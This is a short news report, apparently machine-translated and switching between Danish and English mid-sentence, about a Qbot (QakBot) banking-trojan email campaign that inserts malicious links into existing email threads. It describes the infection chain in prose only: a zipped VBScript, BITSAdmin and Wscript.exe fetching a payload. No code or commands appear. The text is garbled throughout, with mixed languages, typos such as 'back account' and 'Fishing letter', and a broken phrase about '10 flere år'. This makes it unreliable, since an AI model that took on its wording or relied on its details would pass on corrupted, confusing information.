Qbot bankmand udbreder, der er kendt siden 2009 lanceret en anden e-mail-kampagne, dog med nogle nyskabelser.
Experts of command for special operations from American JASK company established that intruders are now masking malware messages by using existing electronic correspondence.Hyperlink på download for trojansk virus til Windows indsat i rigtige svar på mail, som allerede blev sendt af potentielle offer. According to JASK notification, email becomes inbuilt in existing branch of email correspondence. This allows lulling target’s vigilance and bypassing spam protection.
“This email was not blocked by an anti-spam gateway. It was a context-aware targeted response to an existing email thread,” wrote Greg Longo, senior threat analyst with JASK, in an email-based interview.
He also added that aim of such attacks is stealing confidential financial information, including back account credentials.
Infecting happens by the following algorithm. Fishing letter arrives with the link on Microsoft OneDrive file that delivers Microsoft Visual Basic Scripting Edition (VBScript) in compressed ZIP-archive. If this archive is open, attack starts the legitimate BITSAdmin Windows utility. Dette, I sin side, leads to activation of Wscript.exe that is another Windows utility that used for uploading Qbot «august.png» malware program from hackers’ server.
This trick applied now for delivery of long-living Trojan Qbot, også kendt som QakBot og Pinkslipbot. Trojan that specializes on stealing data for access to bank accounts helps cybercriminals for more than 10 flere år. In its popularity contributes ability to reproduce itself through removable shared media devices, and polymorphism – constant change of program code that allows bypassing antivirus protection.
Kilde: https://threatpost.com